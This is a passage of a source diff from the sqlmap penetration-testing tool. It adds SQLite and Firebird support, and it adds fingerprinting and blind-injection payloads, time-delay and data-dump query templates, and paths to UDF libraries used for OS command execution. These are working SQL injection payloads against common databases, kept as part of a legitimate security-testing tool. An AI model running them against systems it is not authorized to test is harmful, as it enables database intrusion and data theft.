payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
|
||||
result = Request.queryPage(payload)
|
||||
retVal = "dialect 3" if result else "dialect 1"
|
||||
return retVal
|
||||
|
||||
def checkDbms(self):
|
||||
if conf.dbms in FIREBIRD_ALIASES:
|
||||
setDbms("Firebird")
|
||||
|
||||
self.getBanner()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
logMsg = "testing Firebird"
|
||||
logger.info(logMsg)
|
||||
|
||||
randInt = randomInt()
|
||||
|
||||
payload = agent.fullPayload(" AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if result:
|
||||
logMsg = "confirming Firebird"
|
||||
logger.info(logMsg)
|
||||
|
||||
payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DMBS is not Firebird"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
setDbms("Firebird")
|
||||
|
||||
self.getBanner()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
kb.dbmsVersion = [self.__sysTablesCheck()]
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not Firebird"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
def getDbs(self):
|
||||
warnMsg = "on Firebird it is not possible to enumerate databases"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on Firebird it is not possible to enumerate the user password hashes"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def readFile(self, rFile):
|
||||
errMsg = "on Firebird it is not possible to read files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def writeFile(self, wFile, dFile, fileType=None, confirm=True):
|
||||
errMsg = "on Firebird it is not possible to write files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osCmd(self):
|
||||
errMsg = "on Firebird it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "on Firebird it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "on Firebird it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "on Firebird it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def forceDbmsEnum(self):
|
||||
conf.db = "Firebird"
|
|
@ -540,10 +540,10 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
|||
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
|
||||
|
||||
if kb.os == "Windows":
|
||||
self.udfLocalFile += "/mysql/windows/lib_mysqludf_sys.dll"
|
||||
self.udfLocalFile += "/mysql/windows/32/lib_mysqludf_sys.dll"
|
||||
self.udfSharedLibExt = "dll"
|
||||
else:
|
||||
self.udfLocalFile += "/mysql/linux/lib_mysqludf_sys.so"
|
||||
self.udfLocalFile += "/mysql/linux/32/lib_mysqludf_sys.so"
|
||||
self.udfSharedLibExt = "so"
|
||||
|
||||
def udfCreateFromSharedLib(self, udf, inpRet):
|
||||
|
|
|
@ -412,10 +412,10 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeove
|
|||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
if kb.os == "Windows":
|
||||
self.udfLocalFile += "/postgresql/windows/%s/lib_postgresqludf_sys.dll" % majorVer
|
||||
self.udfLocalFile += "/postgresql/windows/32/%s/lib_postgresqludf_sys.dll" % majorVer
|
||||
self.udfSharedLibExt = "dll"
|
||||
else:
|
||||
self.udfLocalFile += "/postgresql/linux/%s/lib_postgresqludf_sys.so" % majorVer
|
||||
self.udfLocalFile += "/postgresql/linux/32/%s/lib_postgresqludf_sys.so" % majorVer
|
||||
self.udfSharedLibExt = "so"
|
||||
|
||||
def udfCreateFromSharedLib(self, udf, inpRet):
|
||||
|
|
294
plugins/dbms/sqlite.py
Normal file
294
plugins/dbms/sqlite.py
Normal file
|
@ -0,0 +1,294 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id: oracle.py 1003 2010-01-02 02:02:12Z inquisb $
|
||||
|
||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||||
|
||||
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
||||
|
||||
sqlmap is free software; you can redistribute it and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
Software Foundation version 2 of the License.
|
||||
|
||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import formatDBMSfp
|
||||
from lib.core.common import formatFingerprint
|
||||
from lib.core.common import getHtmlErrorFp
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import sqlmapSyntaxException
|
||||
from lib.core.exception import sqlmapUnsupportedFeatureException
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import SQLITE_ALIASES
|
||||
from lib.core.settings import SQLITE_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
from plugins.generic.fingerprint import Fingerprint
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
from plugins.generic.takeover import Takeover
|
||||
|
||||
|
||||
class SQLiteMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines SQLite methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = SQLITE_SYSTEM_DBS
|
||||
|
||||
Enumeration.__init__(self, "SQLite")
|
||||
Filesystem.__init__(self)
|
||||
Takeover.__init__(self)
|
||||
|
||||
unescaper.setUnescape(SQLiteMap.unescape)
|
||||
|
||||
@staticmethod
|
||||
def unescape(expression, quote=True):
|
||||
# The following is not supported on SQLite 2
|
||||
return expression
|
||||
|
||||
if quote:
|
||||
expression = expression.replace("'", "''")
|
||||
while True:
|
||||
index = expression.find("''")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index + 2
|
||||
index = expression[firstIndex:].find("''")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression.replace("''", "'")
|
||||
|
||||
lastIndex = firstIndex + index
|
||||
old = "''%s''" % expression[firstIndex:lastIndex]
|
||||
unescaped = ""
|
||||
|
||||
for i in range(firstIndex, lastIndex):
|
||||
unescaped += "X'%x'" % ord(expression[i])
|
||||
if i < lastIndex - 1:
|
||||
unescaped += "||"
|
||||
|
||||
#unescaped += ")"
|
||||
expression = expression.replace(old, unescaped)
|
||||
expression = expression.replace("''", "'")
|
||||
else:
|
||||
expression = "||".join("X'%x" % ord(c) for c in expression)
|
||||
|
||||
return expression
|
||||
|
||||
@staticmethod
|
||||
def escape(expression):
|
||||
# Example on SQLite 3, not supported on SQLite 2:
|
||||
# select X'48'||X'656c6c6f20576f726c6400'; -- Hello World
|
||||
while True:
|
||||
index = expression.find("X'")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index
|
||||
index = expression[firstIndex+2:].find("'")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
|
||||
|
||||
lastIndex = firstIndex + index + 3
|
||||
old = expression[firstIndex:lastIndex]
|
||||
oldUpper = old.upper()
|
||||
oldUpper = oldUpper.replace("X'", "").replace("'", "")
|
||||
|
||||
for i in xrange(len(oldUpper)/2):
|
||||
char = oldUpper[i*2:i*2+2]
|
||||
escaped = "'%s'" % chr(int(char, 16))
|
||||
expression = expression.replace(old, escaped)
|
||||
|
||||
return expression
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp:
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp:
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "SQLite"
|
||||
return value
|
||||
|
||||
actVer = formatDBMSfp()
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp["dbmsVersion"]
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def checkDbms(self):
|
||||
"""
|
||||
References for fingerprint:
|
||||
|
||||
* http://www.sqlite.org/lang_corefunc.html
|
||||
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
|
||||
"""
|
||||
|
||||
if conf.dbms in SQLITE_ALIASES:
|
||||
setDbms("SQLite")
|
||||
|
||||
self.getBanner()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
logMsg = "testing SQLite"
|
||||
logger.info(logMsg)
|
||||
|
||||
payload = agent.fullPayload(" AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if result:
|
||||
logMsg = "confirming SQLite"
|
||||
logger.info(logMsg)
|
||||
|
||||
payload = agent.fullPayload(" AND SQLITE_VERSION()=SQLITE_VERSION()")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DMBS is not SQLite"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
setDbms("SQLite")
|
||||
|
||||
self.getBanner()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
version = inject.getValue("SUBSTR((SQLITE_VERSION()), 1, 1)", unpack=False, charsetType=2)
|
||||
kb.dbmsVersion = [ version ]
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not SQLite"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
def forceDbmsEnum(self):
|
||||
conf.db = "SQLite"
|
||||
|
||||
def getCurrentUser(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate the current user"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
def getCurrentDb(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate the current database"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
def isDba(self):
|
||||
warnMsg = "on SQLite the current user has all privileges"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
def getUsers(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate the users"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate the user password hashes"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getPrivileges(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate the user privileges"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getDbs(self):
|
||||
warnMsg = "on SQLite it is not possible to enumerate databases"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getColumns(self, onlyColNames=False):
|
||||
errMsg = "on SQLite it is not possible to enumerate database "
|
||||
errMsg += "table columns"
|
||||
|
||||
if conf.dumpTable or conf.dumpAll:
|
||||
errMsg += ", provide them with -C option"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
logger.warn(errMsg)
|
||||
|
||||
def dumpColumn(self):
|
||||
errMsg = "on SQLite you must specify the table and columns to dump"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def dumpAll(self):
|
||||
errMsg = "on SQLite you must specify the table and columns to dump"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def readFile(self, rFile):
|
||||
errMsg = "on SQLite it is not possible to read files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def writeFile(self, wFile, dFile, fileType=None, confirm=True):
|
||||
errMsg = "on SQLite it is not possible to write files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osCmd(self):
|
||||
errMsg = "on SQLite it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "on SQLite it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "on SQLite it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "on SQLite it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
|
@ -68,9 +68,6 @@ class Enumeration:
|
|||
|
||||
temp.inference = queries[dbms].inference
|
||||
|
||||
def forceDbmsEnum(self):
|
||||
pass
|
||||
|
||||
def getVersionFromBanner(self):
|
||||
if "dbmsVersion" in kb.bannerFp:
|
||||
return
|
||||
|
@ -406,6 +403,15 @@ class Enumeration:
|
|||
( 3, "catupd" ),
|
||||
)
|
||||
|
||||
firebirdPrivs = {
|
||||
"S": "SELECT",
|
||||
"I": "INSERT",
|
||||
"U": "UPDATE",
|
||||
"D": "DELETE",
|
||||
"R": "REFERENCES",
|
||||
"E": "EXECUTE"
|
||||
}
|
||||
|
||||
if kb.unionPosition:
|
||||
if kb.dbms == "MySQL" and not kb.data.has_information_schema:
|
||||
query = rootQuery["inband"]["query2"]
|
||||
|
@ -564,6 +570,8 @@ class Enumeration:
|
|||
query = rootQuery["blind"]["query2"] % (queryUser, index)
|
||||
elif kb.dbms == "MySQL" and kb.data.has_information_schema:
|
||||
query = rootQuery["blind"]["query"] % (conditionChar, queryUser, index)
|
||||
elif kb.dbms == "Firebird":
|
||||
query = rootQuery["blind"]["query"] % (index, queryUser)
|
||||
else:
|
||||
query = rootQuery["blind"]["query"] % (queryUser, index)
|
||||
privilege = inject.getValue(query, inband=False)
|
||||
|
@ -602,6 +610,8 @@ class Enumeration:
|
|||
privileges.add(mysqlPriv)
|
||||
|
||||
i += 1
|
||||
elif kb.dbms == "Firebird":
|
||||
privileges.add(firebirdPrivs[privilege.strip()])
|
||||
|
||||
if self.__isAdminFromPrivileges(privileges):
|
||||
areAdmins.add(user)
|
||||
|
@ -701,7 +711,7 @@ class Enumeration:
|
|||
query = rootQuery["inband"]["query"]
|
||||
condition = rootQuery["inband"]["condition"]
|
||||
|
||||
if conf.db:
|
||||
if conf.db and kb.dbms != "SQLite":
|
||||
if "," in conf.db:
|
||||
dbs = conf.db.split(",")
|
||||
query += " WHERE "
|
||||
|
@ -717,6 +727,17 @@ class Enumeration:
|
|||
value = inject.getValue(query, blind=False)
|
||||
|
||||
if value:
|
||||
if kb.dbms == "SQLite":
|
||||
if isinstance(value, str):
|
||||
value = [[ "SQLite", value ]]
|
||||
elif isinstance(value, (list, tuple, set)):
|
||||
newValue = []
|
||||
|
||||
for v in value:
|
||||
newValue.append([ "SQLite", v])
|
||||
|
||||
value = newValue
|
||||
|
||||
for db, table in value:
|
||||
if not kb.data.cachedTables.has_key(db):
|
||||
kb.data.cachedTables[db] = [table]
|
||||
|
@ -746,6 +767,9 @@ class Enumeration:
|
|||
infoMsg += "database '%s'" % db
|
||||
logger.info(infoMsg)
|
||||
|
||||
if kb.dbms in ("SQLite", "Firebird"):
|
||||
query = rootQuery["blind"]["count"]
|
||||
else:
|
||||
query = rootQuery["blind"]["count"] % db
|
||||
count = inject.getValue(query, inband=False, expected="int", charsetType=2)
|
||||
|
||||
|
@ -764,6 +788,9 @@ class Enumeration:
|
|||
indexRange = getRange(count, plusOne=plusOne)
|
||||
|
||||
for index in indexRange:
|
||||
if kb.dbms in ("SQLite", "Firebird"):
|
||||
query = rootQuery["blind"]["query"] % index
|
||||
else:
|
||||
query = rootQuery["blind"]["query"] % (db, index)
|
||||
table = inject.getValue(query, inband=False)
|
||||
tables.append(table)
|
||||
|
@ -804,6 +831,23 @@ class Enumeration:
|
|||
|
||||
conf.db = self.getCurrentDb()
|
||||
|
||||
firebirdTypes = {
|
||||
"261":"BLOB",
|
||||
"14":"CHAR",
|
||||
"40":"CSTRING",
|
||||
"11":"D_FLOAT",
|
||||
"27":"DOUBLE",
|
||||
"10":"FLOAT",
|
||||
"16":"INT64",
|
||||
"8":"INTEGER",
|
||||
"9":"QUAD",
|
||||
"7":"SMALLINT",
|
||||
"12":"DATE",
|
||||
"13":"TIME",
|
||||
"35":"TIMESTAMP",
|
||||
"37":"VARCHAR"
|
||||
}
|
||||
|
||||
rootQuery = queries[kb.dbms].columns
|
||||
condition = rootQuery["blind"]["condition"]
|
||||
|
||||
|
@ -863,6 +907,9 @@ class Enumeration:
|
|||
elif kb.dbms == "Microsoft SQL Server":
|
||||
query = rootQuery["blind"]["count"] % (conf.db, conf.db, conf.tbl)
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
elif kb.dbms == "Firebird":
|
||||
query = rootQuery["blind"]["count"] % (conf.tbl)
|
||||
query += condQuery
|
||||
|
||||
count = inject.getValue(query, inband=False, expected="int", charsetType=2)
|
||||
|
||||
|
@ -893,6 +940,10 @@ class Enumeration:
|
|||
conf.tbl)
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
field = condition.replace("[DB]", conf.db)
|
||||
elif kb.dbms == "Firebird":
|
||||
query = rootQuery["blind"]["query"] % (conf.tbl)
|
||||
query += condQuery
|
||||
field = None
|
||||
|
||||
query = agent.limitQuery(index, query, field)
|
||||
column = inject.getValue(query, inband=False)
|
||||
|
@ -906,8 +957,14 @@ class Enumeration:
|
|||
query = rootQuery["blind"]["query2"] % (conf.db, conf.db, conf.db,
|
||||
conf.db, column, conf.db,
|
||||
conf.db, conf.db, conf.tbl)
|
||||
elif kb.dbms == "Firebird":
|
||||
query = rootQuery["blind"]["query2"] % (conf.tbl, column)
|
||||
|
||||
colType = inject.getValue(query, inband=False)
|
||||
|
||||
if kb.dbms == "Firebird":
|
||||
colType = firebirdTypes[colType] if colType in firebirdTypes else colType
|
||||
|
||||
columns[column] = colType
|
||||
else:
|
||||
columns[column] = None
|
||||
|
@ -1278,6 +1335,8 @@ class Enumeration:
|
|||
if kb.unionPosition:
|
||||
if kb.dbms == "Oracle":
|
||||
query = rootQuery["inband"]["query"] % (colString, conf.tbl.upper())
|
||||
elif kb.dbms == "SQLite":
|
||||
query = rootQuery["inband"]["query"] % (colString, conf.tbl)
|
||||
else:
|
||||
query = rootQuery["inband"]["query"] % (colString, conf.db, conf.tbl)
|
||||
entries = inject.getValue(query, blind=False)
|
||||
|
@ -1321,6 +1380,8 @@ class Enumeration:
|
|||
|
||||
if kb.dbms == "Oracle":
|
||||
query = rootQuery["blind"]["count"] % conf.tbl.upper()
|
||||
elif kb.dbms == "SQLite":
|
||||
query = rootQuery["blind"]["count"] % conf.tbl
|
||||
else:
|
||||
query = rootQuery["blind"]["count"] % (conf.db, conf.tbl)
|
||||
count = inject.getValue(query, inband=False, expected="int", charsetType=2)
|
||||
|
@ -1365,6 +1426,8 @@ class Enumeration:
|
|||
conf.tbl, column,
|
||||
index, column,
|
||||
conf.db, conf.tbl)
|
||||
elif kb.dbms == "SQLite":
|
||||
query = rootQuery["blind"]["query"] % (column, conf.tbl, index)
|
||||
|
||||
value = inject.getValue(query, inband=False)
|
||||
|
||||
|
|
|
@ -50,3 +50,6 @@ class Fingerprint:
|
|||
errMsg = "'checkDbms' method must be defined "
|
||||
errMsg += "into the specific DBMS plugin"
|
||||
raise sqlmapUndefinedMethod, errMsg
|
||||
|
||||
def forceDbmsEnum(self):
|
||||
pass
|
||||
|
|
BIN
udf/mysql/linux/32/lib_mysqludf_sys.so
Normal file
BIN
udf/mysql/linux/32/lib_mysqludf_sys.so
Normal file
Binary file not shown.
BIN
udf/mysql/linux/64/lib_mysqludf_sys.so
Normal file
BIN
udf/mysql/linux/64/lib_mysqludf_sys.so
Normal file
Binary file not shown.
BIN
udf/mysql/windows/32/lib_mysqludf_sys.dll
Normal file
BIN
udf/mysql/windows/32/lib_mysqludf_sys.dll
Normal file
Binary file not shown.
BIN
udf/mysql/windows/64/lib_mysqludf_sys.dll
Normal file
BIN
udf/mysql/windows/64/lib_mysqludf_sys.dll
Normal file
Binary file not shown.
BIN
udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so
Normal file
BIN
udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so
Normal file
Binary file not shown.
BIN
udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so
Executable file
BIN
udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so
Executable file
Binary file not shown.
BIN
udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so
Executable file
BIN
udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so
Executable file
Binary file not shown.
BIN
udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so
Executable file
BIN
udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so
Executable file
Binary file not shown.
BIN
udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so
Executable file
BIN
udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so
Executable file
Binary file not shown.
BIN
udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so
Executable file
BIN
udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so
Executable file
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
BIN
udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll
Executable file
BIN
udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll
Executable file
Binary file not shown.
BIN
udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll
Executable file
BIN
udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll
Executable file
Binary file not shown.
BIN
udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll
Executable file
BIN
udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll
Executable file
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -30,6 +30,7 @@
|
|||
<error regexp="Access.*Driver"/>
|
||||
<error regexp="Driver.*Access"/>
|
||||
<error regexp="JET Database Engine"/>
|
||||
<error regexp="Access Database Engine"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
|
@ -57,9 +58,17 @@
|
|||
<error regexp="Sybase message"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Interbase -->
|
||||
<dbms value="Interbase">
|
||||
<!-- Interbase/Firebird -->
|
||||
<dbms value="Firebird">
|
||||
<error regexp="Dynamic SQL Error"/>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<error regexp="Warning.*sqlite_.*"/>
|
||||
<error regexp="SQLite/JDBCDriver"/>
|
||||
<error regexp="SQLite.Exception"/>
|
||||
<error regexp="System.Data.SQLite.SQLiteException"/>
|
||||
</dbms>
|
||||
|
||||
</root>
|
||||
|
|
111
xml/queries.xml
111
xml/queries.xml
|
@ -236,4 +236,115 @@
|
|||
</dump_table>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
<cast query="CAST(%s AS VARCHAR(8000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
<isnull query="IFNULL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d, %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="/*"/>
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
<timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
|
||||
<banner query="SQLITE_VERSION()"/>
|
||||
<current_user/>
|
||||
<current_db/>
|
||||
<is_dba/>
|
||||
<check_udf/>
|
||||
<users/>
|
||||
<passwords/>
|
||||
<privileges/>
|
||||
<dbs/>
|
||||
<tables>
|
||||
<inband query="SELECT tbl_name FROM sqlite_master WHERE type='table'"/>
|
||||
<blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d, 1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
|
||||
</tables>
|
||||
<columns/>
|
||||
<dump_column/>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s LIMIT %d, 1" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
</dbms>
|
||||
|
||||
<!-- Microsoft Access -->
|
||||
<dbms value="Microsoft Access">
|
||||
<cast query="CVAR(%s)"/>
|
||||
<length query="LEN(%s)"/>
|
||||
<isnull query="ISNULL(%s)"/>
|
||||
<delimiter query=","/>
|
||||
<limit query="TOP %d"/>
|
||||
<limitregexp query="\s+TOP\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" TOP "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="%00"/>
|
||||
<timedelay/>
|
||||
<substring query="MID((%s), %d, %d)"/>
|
||||
<case query="IIF(%s,1,0)"/>
|
||||
<banner/>
|
||||
<current_user query="CURRENTUSER()"/>
|
||||
<current_db/>
|
||||
<inference query="AND ASC(MID((%s), %d, 1)) > %d"/>
|
||||
<is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Firebird -->
|
||||
<dbms value="Firebird">
|
||||
<cast query="CAST(%s AS VARCHAR(10000))"/>
|
||||
<length query="CHAR_LENGTH(%s)"/>
|
||||
<limit query="ROWS %d TO %d"/>
|
||||
<limitregexp query="\s+ROWS\s+([\d]+)(\s+\TO\s+([\d]+))?"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" ROWS "/>
|
||||
<isnull query="%s"/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<comment query="--"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<timedelay query="SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6"/>
|
||||
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
|
||||
<case query="SELECT IIF(%s,1,0) FROM RDB$DATABASE"/>
|
||||
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM', 'ENGINE_VERSION') FROM RDB$DATABASE"/>
|
||||
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
|
||||
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM', 'DB_NAME') FROM RDB$DATABASE"/>
|
||||
<users>
|
||||
<inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
||||
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
||||
</users>
|
||||
<inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
|
||||
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
||||
<tables>
|
||||
